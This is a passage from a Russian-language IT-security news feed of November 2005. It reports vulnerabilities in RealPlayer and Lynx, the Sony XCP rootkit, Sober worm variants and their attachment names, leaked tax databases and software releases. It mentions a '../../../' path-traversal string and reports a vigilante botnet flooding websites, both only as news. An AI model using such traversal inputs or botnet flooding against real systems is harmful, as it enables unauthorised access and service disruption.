Эксперты по информационной безопасности обнаружили уязвимость в продуктах различных производителей, которая позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимы RealPlayer 10.5; iTunes 4.7.1.30; Kaspersky Anti-Virus for Windows File Servers 5.0; Microsoft Antispyware 1.0.509 (Beta 1). "Дыра" связана с небезопасным вызовом функции CreateProcess(). Успешная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего уязвимое приложение. «Дыре» присвоен рейтинг опасности «средняяя». Для использования уязвимости нет эксплойта. В настоящее время способов устранения уязвимости не существует.
Источник

17/11/2005 11:25 ФСБ не смогла остановить торговцев базами о доходах россиян
Правоохранительным органам пока не удалось приостановить распространение баз данных, содержащих информацию о налоговых декларациях граждан, пишет в четверг газета "Коммерсант". В среду ФСБ РФ распространила пресс-релиз, в котором говорилось, что "контрразведчиками и сотрудниками УБЭП ГУВД Москвы изъяты десятки тысяч подготовленных к продаже электронных носителей, а также технические средства для массового тиражирования баз данных, изготовители и продавцы задержаны". Целью проведенной операции должно было стать если не полное пресечение, то хотя бы приостановление распространения налоговых баз данных по Москве и области, пишет "Коммерсант". Однако достичь планируемого результата пока не удалось. Корреспондент издания в среду вечером по рекламным объявлениям, присылаемым по электронной почте, за 30 минут нашел пять организаций, предлагающих подобные базы данных. Все продавцы сообщили, что в наличии у них есть требуемая база налоговых отчислений москвичей за 2004 год. По данным газеты "Ведомости", задержанные в ходе операции ФСБ несколько человек, которые занимались производством и оптовой продажей базы, заявляют, что купили сведения у неких чиновников за 2,5 миллиона долларов. Представитель ГВД Москвы, пожелавший остаться неназванным, сообщил изданию, что эта информация проверяется и никто из чиновников пока не задержан. В настоящий момент сотрудники силовых структур работают в вычислительных центрах Федеральной налоговой службы и Пенсионного фонда, сверяя оказавшиеся в продаже данные с базами этих ведомств.
Подробности

17/11/2005 10:49 Средство для удаления "вредной" музыкальной защиты Sony оказалось еще вреднее
Как пишет bugtraq.ru, средство удаления защиты XCP, выпущенное теми же господами из First4Internet, которые выпустили и саму защиту оказалось не менее вредоносным, чем сама защита. Практически в самом начале этого скандала Sony предоставила своим пользователям возможность удалить защитный софт, предварительно заполнив форму на своем веб-сервере. При этом на машину пользователя скачивается и устанавливается ActiveX-компонент от First4Internet, названный CodeSupport, который и проделывает работу по удалению. Прелесть ситуации заключается в том, что CodeSupport остается в системе и после завершения своей работы. Причем любой сайт может использовать его для загрузки и исполнения любого кода - он не проверяет, что скачиваемый код исходит от Sony или First4Internet, а заодно помечен как безопасный для использования в скриптах, так что все это будет проделано незаметно для пользователя. По очень предварительным оценкам число систем, зараженных CodeSupport, может достигать полумиллиона.
Более подробно

17/11/2005 10:28 Microsoft выпустила первую бета-версию Office 12
В среду вечером Microsoft выпустила первую тестовую версию Office 12, следующего поколения своего вездесущего комплекса настольного ПО. Компания сообщила, что она предоставит код Beta 1 около 10 тыс. заранее аттестованных тестеров, а более широкий тестовый релиз последует весной. Финальную версию Office 12 Microsoft обещает выпустить во втором полугодии будущего года, примерно в то же время, что и обновление операционной системы Windows Vista. «Следующая версия Office представляет собой важнейший релиз более чем за десять лет, — говорится в заявлении вице-президента Microsoft Криса Капосселлы. — Теперь, после многолетних исследований и разработок, мы готовы предоставить это ПО для тестирования и сбора технических замечаний от избранных заказчиков и партнеров». Microsoft предупреждала, что она выпустит тестовую версию в этом месяце, а на прошлой неделе разослала уведомления тем тестерам, которые были отобраны для участия в программе. В Beta 1 входят новые версии стандартных приложений Word, Excel, PowerPoint и Outlook, а также несколько не так хорошо известных членов семейства Office, включая СУБД Access, программу для написания заметок OneNote, программу верстки Publisher и набор средств коллективной работы Groove Virtual Office. Пока из Office 12 Microsoft продемонстрировала лишь обновленный пользовательский интерфейс, а также рассказала о других широких усовершенствованиях. Но полного набора новых функций компания еще не выпускала и не говорила, сколько будет стоить новый продукт и как он будет компоноваться.
Источник

17/11/2005 10:04 Задержаны распространители баз данных о доходах россиян
ФСБ РФ задержала группу лиц, занимавшихся распространением баз данных, содержащих информацию о налоговых декларациях граждан. Последняя информация о том, что такие базы появлялись в свободной продаже, появилась в прессе восьмого ноября. Тогда собщалось о том, что по факту похищения баз данных уголовные дела возбуждены не были. Пресс-релиз ФСБ отмечает, что задержания произведены 15-16 ноября сотрудниками ФСБ во взаимодействии с УБЭП ГУВД Москвы в рамках оперативного сопровождения уголовного дела по факту хищения баз данных, возбужденного Главным следственным управлением при ГУВД Москвы. При этом изъяты десятки тысяч подготовленных к продаже электронных носителей, а также технические средства для массового тиражирования баз данных, пишет РИА Новости. Кроме базы о доходах граждан за 2004 год, в свободной продаже на рынках и в интернете находятся аналогичные базы данных по доходам граждан за 2003 и 2002 годы, а также многие другие базы данных государственных служб - информация о проводках Центробанка, регистрации автомобилей и т.п.
РИА "НОВОСТИ"

16/11/2005 14:33 Атаки хакеров становятся все более агрессивными и непредсказуемыми
ровень хакерского «мастерства» неуклонно растет, а их атаки становятся все более агрессивными и непредсказуемыми. Если 10 лет назад первые хакеры (в основном студенты) рассылали вирусы по домашним пользователям просто чтобы поразвлечься, то теперь, по словам специалистов, ситуация кардинально изменилась. Сейчас хакеры наносят ежегодный ущерб мировой экономике в размере примерно $1 млрд. Были случаи, когда отдельным лицам удавалось взламывать банковские счета на сумму около $500 млн. Хакерство стало способом заработать большие деньги. Вирусы типа Trojan Love Letter и Melissa в 2001 году нанесли ущерб на сумму более $10 млрд. Там где вертятся крупные суммы, там, как известно, всегда есть криминал. Массовая сетевая криминализация началась в 2000-2001 гг. Вирусы нового поколения, такие, как My Doom, NetSky писались уже преимущественно, для получения доступа к банковским счетам. В 2004 году наметился некий спад хакерской активности. Специалисты объясняют это появлением эффективных антивирусных систем, возможностью оперативного написания соответствующих апдейтов и успешной борьбой правоохранительных органов с создателями вирусов. Сменился и образ типичного хакера. Сейчас это - объединение высоких профессионалов, взламывающих корпоративные сети для добывания конкурентной информации по заказу. Взломщики поумнели, поняли, что для достижения желаемой цели им вовсе не обязательно поражать вирусами миллионы компьютеров, а достаточно ограничиться несколькими тысячами.
Источник

16/11/2005 13:24 Мобильные компьютеры – мечта вора
Каждый третий мобильный компьютер и смартфон никак не защищен от несанкционированного входа в систему третьими лицами. То, что на компьютерах зачастую хранится крайне важная информация, их хозяев не смущает. По данным, полученным в ходе всемирного опроса владельцев мобильных вычислительных устройств, офисные работники охотно используют эти устройства для хранения в их памяти корпоративной информации, включая контактные данные клиентов, адреса электронной почты, пароли и сведения о состоянии банковских счетов. Несмотря на то, что количество теряемых хозяевами устройств продолжает расти (в этом году о потере компьютера или телефона заявили 22 процента опрошенных – почти на треть больше, чем в прошлом году), закрывать операционные системы своих друзей паролями хозяева не спешат. Из всех утерянных в этом году телефонов, а также карманных и мобильных компьютеров, паролем были защищены только около двадцати процентов, сообщает Reuters.
Источник

16/11/2005 12:38 Мобильный контент трёх американских компаний содержал программы-шпионы
Американский суд запретил деятельность трёх интернет-компаний за то, что те втихомолку "встраивали" шпионские программы в рингтоны, музыкальные программы и прочие бесплатные продукты, объявила Федеральная торговая комиссия (ФТК). Вредоносный софт отслеживал активность "жертв" в сети, взламывал их домашние страницы и заваливал их многочисленными рекламными баннерами. Счета калифорнийских компаний Enternet Media и Conspy, а также находящейся в штате Огайо Lwebtunes были заморожены до окончания судебных разбирательств. Кроме того, суд обязал все три компании приостановить загрузку контента со своих сайтов. Представители всех трёх компаний оказались комментировать эту ситуацию, сообщает Reuters. В исковом заявлении, поданном в окружной суд Лос-Анджелеса, говорится, что вместе с музыкальными файлами и рингтонами пользователь скачивал на свой компьютер вредоносный софт. Калифорнийские трояны маскировались под обновление системы безопасности Microsoft Internet Explorer, а Lwebtunes паковала "шпиона" к программе, воспроизводящей музыку в блогах. Удалить шпионскую программу с компьютера было очень сложно.
Источник

16/11/2005 12:06 Microsoft выпустила вторую бета-версию Windows для кластеров
Корпорация Microsoft в рамках международной конференции по высокопроизводительным вычислениям Supercomputing 2005 представила вторую бета-версию операционной системы Windows Compute Cluster Server 2003 для кластеров. На презентации в Сиэтле (штат Вашингтон) выступил с речью основатель Microsoft Билл Гейтс. По словам Гейтса, высокопроизводительные вычисления сейчас как никогда востребованы в самых разнообразных сферах - от автомобилестроения и проектирования новых авиалайнеров до медицинских исследований и изучения глобальных изменений климата. Новая программная платформа Windows Compute Cluster Server 2003 должна помочь в решении сложных задач, требующих участия большого количества процессоров. Эта операционная система совместима с 32/64-х разрядными чипами с архитектурой х86 и, по заявлениям Microsoft, проста во внедрении, управлении и обладает расширенными средствами интеграции с существующей инфраструктурой. При создании Windows Compute Cluster Server 2003 компания Microsoft активно взаимодействовала с партнерами и научными организациями с целью обеспечения максимальной гибкости новой ОС и удобства эксплуатации. Финальная версия операционной системы должна выйти в начале следующего года.
Подробности

16/11/2005 11:45 Количество клавиатурных шпионов увеличилось на 65%
Компания по ИТ-безопасности iDefense сообщила о росте числа обнаруженных программ — клавиатурных шпионов на 65%, до 6191 в этом году против 3753 в прошлом. В 2000 году их было всего 300. Клавиатурные шпионы — одно из главных орудий хакеров для кражи информации. Вице-президент iDefense Security Intelligence, принадлежащей VeriSign, Джо Пейн (Joe Payne) сказал, что запись нажатых клавиш — очень эффективный метод для хакеров. «Мошенники могут запускать сотни клавиатурных шпионов по всему миру за считанные секунды, собирая важные данные для крупномасштабных денежных переводов», — заявил он. По данным доклада компании, в среднем каждая жертва лишается $3968. 16% жертв приходилось оплачивать хотя бы один из хакерских переводов, и в среднем проводит 81 час на решение вопросов, связанных с мошенничеством в отношении их кредитных карт. iDefense проводит исследование активности интернет-преступников, говорящих на 13 языках, в более чем 30 странах
Источник

16/11/2005 11:01 Personal Safe'n'Sec 2.0: новая версия защитного ПО от StarForce
Компания StarForce Technologies объявляет о коммерческом запуске в России новой версии продукта Personal Safe'n'Sec - 2.0. Проактивная система защиты Safe'n'Sec гарантирует защиту ПК и корпоративных сетей от таких видов угроз, как ранее неизвестные вирусы, программы-шпионы, троянские программы, хакерские атаки, взлом, кража информации, ошибочные действия пользователя. Перехватывая системные вызовы, Safe'n'Sec анализирует действия приложений на предмет потенциальной опасности. В случае угрозы Safe'n'Sec блокирует вредоносную программу прежде, чем системе будет нанесен какой-либо ущерб. Personal Safe'n'Sec 2.0, по мнению разработчиков, содержит более информативные по сравнению с предыдущей версией окна предупреждений и информационных сообщений. Так пользователю стала доступна подробная техническая информация о приложении и его активности, для правильного принятия решения появился текстовый раздел "Совет". Новая опция "завершить приложение" позволяет заблокировать вредоносную активность и завершить приложение немедленно после поступления предупреждения о его опасности. Кроме того, в настройках программы существует возможность включения/выключения контроля активности определенного типа.
Подробности

16/11/2005 10:41 Следующей угрозой могут стать шифрованные боты
Чтобы усложнить попытки сопротивления, киберпреступники, захватывающие наши компьютеры, намерены прибегнуть к шифрованию. Эксперт утверждает, что киберпреступники, стремясь сохранить контроль над захваченными ПК, скоро добавят к своему арсеналу шифрование, чтобы воспрепятствовать обнаружению и удалению вредоносного ПО. Выступив на конференции Института компьютерной безопасности в Вашингтоне, инженер по информационной безопасности из SRA International Адам Мейерз предупредил, что в ближайшем будущем авторы ботов начнут применять шифрование, чтобы скрыться от средств защиты и анализаторов сетевых пакетов. «Мы увидим шифрованные сеансы, и тогда обнаружить бот-сети станет еще труднее», — сказал он. После установки на ПК бот-программа обычно подключается к каналу Internet Relay Chat и ожидает команд. Трафик IRC может указывать на присутствие в компьютере бот-ПО и улавливается такими средствами защиты, как системы обнаружения вторжений (IDS) или анализаторы протокола, например, Ethereal. «Создатели ботов попытаются скрыться от IDS, которые следят за соединениями IRC, и от таких инструментов, как Ethereal, — говорит Мейерс. — Они сделают все, чтобы замести следы. Постоянно изобретаются новые методы, и исследователям, чтобы выйти на тот же уровень, требуется какое-то время».
Подробности

16/11/2005 10:19 Широкополосный Интернет ударил по московским пиратам
Объемы розничных продаж пиратских компьютерных программ в Москве ощутимо сокращаются – к такому выводу, как сообщила во вторник газета "Коммерсант", пришли эксперты комиссии по безопасности информационного рынка (КБИР) при правительстве Москвы. Отмечается, что если в начале 2005 года ежемесячные продажи пиратских дисков с ПО достигали 130 миллионов рублей, то сейчас сумма снизилась вдвое. Эксперты увязывают спад розничных продаж пиратских дисков с развитием домашнего широкополосного доступа в Интернет и ростом онлайновой торговли контрафактной продукцией. Та же тенденция в последнее время коснулась пиратской музыки и DVD, пишет газета. Газета добавляет, что с оценками экспертов соглашаются и сами пираты. "В начале года у нас продавалось порядка 70, в отдельные дни до 100 дисков с софтом, - Приводит "Коммерсант" слова одного из торговцев нелегальными дисками. - Самую большую прибыль приносят DVD с записью трех, шести, восьми фильмов. Это своеобразная реакция рынка традиционных носителей на подешевевший Интернет. Купил диск с четырьмя фильмами сразу – и не надо их часами в Сети выкачивать. Качество картинки сопоставимо с компьютерным, а звук лучше".
Источник

15/11/2005 14:13 Массовое распространение клонов Sober угрожает пользователям интернета
"Лаборатория Касперского" сообщает об обнаружении трех новых модификаций известного сетевого червя "Email-Worm.Win32.Sober". По классификации "Лаборатории Касперского" им были присвоены индексы "u", "v" и "w". Все новые варианты червя представляют собой различные варианты паковки одной и той же вредоносной программы. Многочисленные случаи обнаружения в почтовом трафике новых модификаций Sober подтверждают информацию о том, что данная эпидемия вызвана цепью спам-рассылок зараженных червем писем. Новые варианты Sober были разосланы через электронную почту в виде вложений в электронные письма. Размер приложенного файла, который и содержит тело червя, составляет около 130 Кб. Несмотря на то, что заголовок и текст зараженного письма произвольны либо отсутствуют, распознать опасное сообщение позволяет ограниченность набора названий приложенного файла. Они могут быть следующими:
Exceltab-packed_List.exe;
Liste.zip;
Reg-List-Dat_Packer2.exe;
reg_text.zip;
Word-Text.zip;
Word-Text_packedList.exe;
Word-Text_packedList.zip.
Процедура запуска новых версий вредоносной программы стандартна для семейства Sober. Активизация червя производится при самостоятельном открытии пользователем файла, приложенного к зараженному письму. После запуска червь выводит на экран ложное сообщение об ошибке: "WinZip Self-Extractor. WinZip_Data_Module is missing ~Error". Затем новые версии "Sober" копируют себя в системный каталог Windows и регистрируют себя в ключе автозапуска системного реестра. Помимо этого, они создают несколько дополнительных копий и вспомогательных файлов с разными именами в системном каталоге Windows. Для своего размножения черви сканируют файловую систему пораженного компьютера в поисках адресов электронной почты и рассылают себя по обнаруженному списку адресатов.
Источник

15/11/2005 13:27 Sony отказалась от троянской защиты
Sony BMG приостановила комплектацию музыкальных компакт-дисков программой защиты от копирования — XCP. Решение было принято после того, как появились несколько троянцев, которые воспользовались средствами программы для сокрытия своего присутствия на компьютере. Ранее защита вызвала нарекания у пользователей за невозможность удалить ее из памяти обычными средствами и поглощение системных ресурсов. Производители антивирусов занесли программу в разряд троянских, а в США даже был подан групповой иск: компания не предупредила пользователей о возможных сложностях с удалением средства защиты. При запуске компакт-диска программа вела себя как троянец: незаметно устанавливалась в память, запускаясь после каждой перезагрузки. Она скрывала свое присутствие на диске и в реестре, перехватывая обращение к файлам с определенными именами. Эксперты предупредили о возможном использовании этой особенности вредоносным кодом, а спустя несколько дней появился первый троянец для Windows, маскирующийся при помощи XCP.
Источник

15/11/2005 13:09 Генератор коллизий MD4/MD5
Patrick Stach предлагает секьюрити-сообществу исходный код генератора коллизий для алгоритмов хэширования MD4 и MD5. Программа демонстрирует технологию, описанную криптоаналитиком Xiaoyun Wang в статье "How to Break MD5 and Other Hash Functions". Напомним, что коллизией в криптографии называется число (слово?), которое имеет ту же хэш-функцию, что и закодированное. Как утверждает Патрик, при помощи данной программы на его Пентиум4 с частотой 1.6 ГГц одна MD5-коллизия формируется в среднем за 45 минут, MD4 практически мгновенно.
Исходные коды

15/11/2005 12:28 Сайт по борьбе с вредоносным ПО
Paul Laudanski от имени проекта CastleCops анонсировал открытие сайта, посвящённого борьбе с вредоносным ПО (Malware Removal and Prevention). Как он пишет в своём анонсе - основная цель материалов, которые содержатся на сайте - помочь не очень грамотным пользователям без ущерба для психики и кошелька самостоятельно (без помощи специалистов) бороться с вредоносным ПО, к которому относятся следующие "звери" - adware, spyware, trojans, viruses, browser hijackers.
Cайт проекта

15/11/2005 12:05 Нарушитель закона об использовании компьютеров стал экспертом в IT-компании
Британский хакер Дэниэл Катберт (Daniel Cuthbert), в октябре признанный виновным в несанкционированном доступе к сайту фонда помощи пострадавшим от цунами в Юго-Восточной Азии, приступил к работе в компании Corsaire, сообщает ZDNet. Работодатель Катберта занимается обеспечением информационной безопасности. Директор Corsaire Мартин О'Нил (Martin O'Neal) заявил, что решение о приеме Катберта на работу было принято еще до того, как он добрался до закрытых для обычных пользователей разделов сайта фонда помощи пострадавшим от цунами: «Дело в том, что мы знакомы с Дэниэлом долгое время. Он был хорошо известен в информационной индустрии еще до случая с взломом сайта фонда. Его честность никогда не вызывала вопросов». Катберт объяснил в суде свои действия следующим образом. Он сам внес некоторую сумму денег в фонд, но позже решил, что стал жертвой мошенников. Чтобы проверить подлинность ресурса и перейти в его корневой каталог, Катберт добавил в адресную строку выражение «../../../». Это действие и стало поводом для судебного разбирательства в отношении него. Эксперты в области информационной безопасности выразили обеспокоенность в связи с признанием Катберта виновным. «Что касается его вины, это откровенный бред. Случай с Катбертом показывает насколько несовершенен CMA (закон о ненадлежащем использовании компьютеров). Проблема в определении неавторизованного доступа в контексте работы с открытыми веб-серверами», — заявил О'Нил.
Источник

15/11/2005 11:49 Microsoft сделает настольные приложения бесплатными?
Microsoft не только готовит новые онлайновые службы, поддерживаемые рекламой, но и планирует предложить бесплатные, также поддерживаемые рекламой, версии некоторых своих настольных продуктов. Ни о каких конкретных планах объявлено не было, но согласно внутренним документам, попавшим в распоряжение CNET News.com, топ-менеджеры Microsoft размышляют о целесообразности выпуска поддерживаемых рекламой продуктов типа Works, Money или даже самой операционной системы Windows. «Бизнес веб-рекламы растет, а доходы от потребителей сокращаются, поэтому мы должны подумать о создании поддерживаемых рекламой версий своего ПО», — говорится в документе, предложенном руководству компании. Он был подготовлен для одного из совещаний Thinkweek, которые проводятся дважды в год и на которых Билл Гейтс и другие топ-менеджеры рассматривают новые возможные направления развития компании. Официальные представители Microsoft подтвердили подлинность документа, датированного зимой 2005 года, но от комментариев по его содержанию отказались. Однако источник в Microsoft охарактеризовал документ как внутреннее упражнение по методу «мозгового штурма». «Это просто рассмотрение разных моделей предоставления ПО заказчикам, — сказал он. — Это не политика и не план, и никаких решений принято не было — просто некоторые мысли наших исследовательских и бизнес-подразделений».
Подробнее

15/11/2005 11:38 Уязвимость в Lynx
iDefense Security сообщает о наличии уязвимости в текстовом браузере Lynx, довольно популярном в мире открытых систем. Уязвимость существует в механизме запуска локальных программ через URI вида "lynxcgi:". Этот тэг предназначен для выполнения локальных программ в с очень большими ограничениями, которые позволяют запустить определённые программы только в специально оговоренных директориях. Однако, в результате ошибки в конфигурационном файле для Lynx во многих дистрибутивах, возникает возможность выполнения произвольных команд от имени пользователя, запустившего браузер. Также могут быть использованы тэги "lynxexec", "lynxprog", однако они редко используются при компиляции программы. Подобная уязвимость присутствует в дистрибутивах следующих производителей: Red Hat Inc., Gentoo Foundation Inc., Mandriva SA. В FreeBSD и OpenBSD по умолчанию подобный тэг работает так, как положено. Для исправления уязвимости пользователям рекомендуют включить строку TRUSTED_LYNXCGI:none в файл lynx.cfg. Также уязвимость устранена в версии 2.8.6dev.15.
Описание

15/11/2005 11:13 Ошибка в VPN угрожает интернет-трафику
Ошибка в ключевом протоколе интернет-безопасности, который используется в большинстве сетевых продуктов, может сделать системы беззащитными перед атаками на отказ в обслуживании и другими видами атак, предупреждают эксперты. В понедельник финские исследователи из Университета Оулу объявили о том, что они обнаружили уязвимость в протоколе Internet Security Association and Key Management Protocol, или ISAKMP. Данная технология применяется в виртуальных частных сетях IPsec и межсетевых экранах многих сетевых компаний, включая Cisco Systems и Juniper Networks. Согласно рекомендациям, опубликованным совместно Британским национальным центром координации безопасности инфраструктуры и финским CERT, степень опасности зависит от поставщика ПО. «Эти ошибки могут создать условия для атак на отказ в обслуживании, а также для атак с использованием уязвимостей форматирующей строки и переполнения буфера», — говорится в рекомендациях. Все это грозит выходом из строя устройств и замедлением передачи данных через интернет. В некоторых случаях хакеры могут исполнять собственный код и перехватывать управление устройством, предупреждает NISCC. Cisco предложила бесплатные обновления для исправления проблемы и опубликовала предупреждение об опасности. В перечень продуктов Cisco, на которые влияет данная ошибка, входят Cisco IOS, Cisco PIX Firewall, Cisco Firewall Services Module, Cisco VPN 3000 Series Concentrators и Cisco MDS Series SanOS. Ошибка влияет и на программное обеспечение IPsec Openswan Project, используемое во многих Linux-продуктах. Стоящая за ним организация выпустила исправленную версию Openswan 2.4.2. Поставщик сетевого оборудования 3Com сообщил, что компания изучает этот вопрос, а IBM и Microsoft заявили, что их продукты вне опасности.
Описание уязвимости

15/11/2005 10:28 В Украине создается служба специальной связи и защиты информации
Президент Украины Виктор Ющенко поручил кабинету министров этой страны создать службу специальной связи и защиты информации. Как сообщает в понедельник агентство ПРАЙМ-ТАСС, об этом говорится в подписанном накануне указе. Новый орган будет создан как центральный орган исполнительной власти со специальным статусом. Его основными задачами Ющенко определил проведение политики в сфере защиты государственных информационных ресурсов в сетях передачи данных, обеспечение работы правительственной связи, "национальной системы конфиденциальной связи", криптографической и технической защиты информации. Украинский президент поручил Службе безопасности Украины (СБУ) и Министерству транспорта и связи до 1 января 2006 года разработать и утвердить технические требования к средствам снятия информации с каналов связи на телекоммуникационных сетях, необходимых для осуществления оперативно-розыскных мер. Президент Украины поручил Министерству юстиции, СБУ, Министерству обороны, Службе внешней разведки, пограничникам, Налоговой и Госдепартаменту по исполнению наказаний обеспечить соблюдение конституционных прав при применении негласного проникновения в жилье, снятии информации с каналов связи, контроле за перепиской, телефонными разговорами, телеграфной и другой корреспонденцией, применении других технических средств получения информации
Подробности

15/11/2005 10:20 Новая волна атак на сайты чеченских террористов
На сайте проекта "Cyber Underground Community VS Terrorism" (peace4peace.com), о создании которого мы сообщали ранее, сообщается о запуске 14 ноября ботнета, основной целью которого является перегрузка каналов связи серверов, которые спонсируются террористическими организациями. В данный момент в списке фигурирует 13 сайтов соответствующей тематики. Как сообщается на сайте, уже видны явные успехи проекта - большинство сайтов испытывают проблемы с перегрузкой канлаов, работа многих - блокирована. В данный момент ботнет проекта только лишь начал набирать обороты. Приведённые результаты всего лишь начало большой работы. В течение двух последующих недель планируется постепенное увеличение ботнета в шесть-восемь раз по сравнению с текущим размером. Итогом работы будет постоянно обновляющийся гибридный ботнет превышающий миллион зомби машин.
Подробности

14/11/2005 21:43 Трое российских интернет-мошенников получили срок
2 ноября были осуждены трое россиян, покупавших товары в интернет-магазине Softkey по чужим кредитным картам. Останкинский суд признал Бориса Позднеева, Олега Рыжикова и Сергея Дмитриева виновными по части 4 ст. 159 УК - мошенничество, совершенное организованной группой (предусматривает лишение свободы на срок от пяти до десяти лет со штрафом в размере от 1 млн. рублей). Однако суд принял во внимание смягчающие обстоятельства (возмещение ущерба и помощь следствию), пишет газета "Ведомости". Молодые люди, возраст которых 18-19 лет, получили по пять лет условного заключения. С февраля по апрель 2005 года Позднеев, Рыжиков и Дмитриев приобретали через интернет софт и вводили номера карт и персональную информацию, которую они приобрели у неустановленных мошенников. В общей сложности преступная группа купила ПО на 80000 рублей. Подозрительные покупки привлекли внимание отдела мониторинга Softkey, и за приобретениями с этих кредитных карт начали следить правоохранительные органы. В апреле 2005 года мошенники были задержаны при покупке компьютерных товаров на 60000 рублей. По словам менеджера по связям с общественностью группы компаний "Софткей" Ольги Мананниковой, ежемесячно в Softkey проходит около 1500 платежей по кредитным картам. При этом отказы платить по выставленным счетам бывают лишь раз в четыре месяца, хотя мошенники пытаются купить товары по чужим картам каждый день. Позднеев, Рыжиков и Дмитриев - не первые осужденные за покупки по чужим кредиткам. На "Озоне" мошенники также приобретали товары, магазин передавал информацию по злоумышленникам правоохранительным органам, и дело доходило до суда.
Источник

14/11/2005 15:07 Вышла бесплатная версия СУБД Oracle Database 10g Express Edition
Корпорация Oracle выпустила Oracle Database 10g Express Edition (Oracle Database XE) - бесплатную версию СУБД для разработчиков. Новая редакция продукта предоставляет возможность разработчикам ПО, администраторам баз данных и всем желающим получить бесплатную базовую версию СУБД, позволяющую начать разработку и развертывание собственных приложений. Кроме того, эта версия предлагается бесплатно независимым разработчикам ПО и поставщикам оборудования для свободной дистрибуции или встраивания в собственные приложения. Редакция Oracle Database XE создана на основе СУБД Oracle Database 10g Release 2 и полностью совместима с семейством программных продуктов Oracle Database, включая Oracle Standard Edition One, Oracle Standard Edition и Oracle Enterprise Edition. Пользователи имеют возможность начать работу с базовой редакции, а впоследствии модернизировать ее до других редакций Oracle Database 10g и перевести свои приложения на работу с новыми редакциями СУБД без изменения их кода.
Подробности

14/11/2005 14:15 Критические дыры в медиаплеерах RealNetworks
В программных плеерах RealPlayer компании RealNetworks обнаружены несколько опасных уязвимостей, используя которые злоумышленники теоретически могут захватить полный контроль над удаленным компьютером. О двух из найденных дыр сообщила компания eEye Digital Security. Первая проблема связана с обработкой мультимедийных файлов в формате RealMedia. Для реализации атаки необходимо вынудить жертву открыть в одном из уязвимых приложений сформированный особым образом RM-файл. При этом на компьютере возникает ошибка переполнения стека, провоцирующая последующий запуск произвольного вредоносного кода. Вторая брешь может быть задействована через специально созданный файл интерфейсной темы ("скин") для RealPlayer. Данная уязвимость также обеспечивает возможность получения полного доступа к машине жертвы. Наконец, последняя из выявленных ошибок проявляется в процессе обработки интерфейсных тем в одной из библиотек RealPlayer, разработанных сторонними производителями. Впрочем, в RealNetworks отмечают, что практических случаев эксплуатации уязвимостей пока зафиксировано не было. Дыры присутствуют в программах RealPlayer 10.5, RealPlayer 10, RealOne Player v1/v2, RealPlayer 8 и RealPlayer Enterprise для операционных систем Microsoft Windows, RealPlayer 10 для платформ Apple Mac OS и Linux, а также Helix Player для Linux.
Подробности

14/11/2005 11:55 Читаем и создаем PDF документы
Обновились сразу две замечательные утилиты, предназначенные для чтения и создания PDF документов. Встречайте, Foxit PDF Reader версии 1.3 и pdf995 Suite. Помимо прочих достоинств, обе они бесплатные.
Подробнее об утилитах

14/11/2005 11:31 Служба HouseCall проверит ПК на наличие шпионских программ
Японская компания Trend Micro обновила HouseCall - бесплатную службу онлайнового сканирования компьютеров на наличие вредоносных программ. Теперь этот сервис включает средства для обнаружения и удаления шпионских программ, а также обеспечивает более широкую поддержку браузеров и операционных систем. Cлужба Trend Micro HouseCall была запущена в мае 1997 года. Она позволяет пользователям сканировать и очищать свои компьютеры от вирусов, червей и других вредоносных программных кодов с помощью браузера. Теперь стало возможным обнаруживать и удалять шпионские и рекламные программы. Trend Micro расширила поддержку браузеров службой HouseCall, включив в их число (помимо Microsoft Internet Explorer), такие браузеры, как Mozilla (Firefox), Opera и Netscape. Помимо поддержки операционных систем Microsoft 98/NT4.0/W2K/W2K3/XP SP2, сервис HouseCall теперь совместим и с другими ОС, не относящимися к семейству Windows, включая MacOS X, Solaris и Linux.
Доступ к сервису

14/11/2005 11:22 Microsoft также удаляет rootkit от Sony
Microsoft добавит в свои инструменты безопасности средства обнаружения и удаления части механизма защиты от копирования, устанавливаемого на ПК при проигрывании некоторых музыкальных CD. Согласно постингу, появившемуся в субботу в корпоративном блоге Microsoft, компания выяснила, что инструмент rootkit, входящий в состав ПО XCP, записанного на некоторых музыкальных дисках Sony BMG Music Entertainment, может угрожать безопасности Windows-ПК. Чтобы защитить пользователей, Microsoft планирует обновить инструменты Windows AntiSpyware и Malicious Software Removal Tool, а также онлайновый сканер в Windows Live Safety Center, чтобы они выявляли и удаляли ПО Sony BMG. Windows AntiSpyware — это антишпионское ПО Microsoft, которое в виде бета-версии используется миллионами людей во всем мире и для которого Microsoft выпускает еженедельные обновления. Windows Malicious Software Removal Tool обновляется ежемесячно и входит в состав регулярно выпускаемых Microsoft секьюрити-патчей. Обнаруживать и удалять компонент rootkit будет и Windows Defender, будущая версия Windows AntiSpyware, которая войдет в состав преемника Windows ХР — Windows Vista.
Подробнее

14/11/2005 10:30 Gartner советует игнорировать Vista до 2008 года
Спешить с переходом на следующую версию Windows нет никаких убедительных причин, утверждает Gartner. Компаниям незачем спешить с переходом на Microsoft Windows Vista, утверждает аналитическая фирма Gartner, которая убеждена, что большинство из них вполне могут подождать до 2008 года. Подавляющая часть усовершенствований в Vista связаны с безопасностью, и большинство этих усовершенствований «уже сегодня доступны в продуктах от независимых поставщиков», пишет Gartner в опубликованном в пятницу документе. Vista будет отличаться от своих предшественниц лишь «постепенными, эволюционными усовершенствованиями», и пользователям ХР следует «придерживаться стратегии управляемого разнообразия», переводя на Vista только новые машины — и не ранее 2008 года, рекомендуют аналитики. В своей записке «Десять причин, по которым следует и не следует беспокоиться по поводу клиента Microsoft Windows Vista» Gartner отмечает слабые места в стратегии платформы Microsoft. В Internet Explorer (IE) 7 будет много усовершенствований в части безопасности, «чтобы взять реванш у Firefox», и работа над ним «была ускорена», чтобы выпустить этот продукт в начале 2006 г. Но «важная возможность ограничить некоторые действия браузера менее привилегированными процессами» реализована не будет, так как для этого требуется функциональность Vista», предупреждает Gartner.
Подробности

14/11/2005 10:11 Интернет могли изобрести на Украине
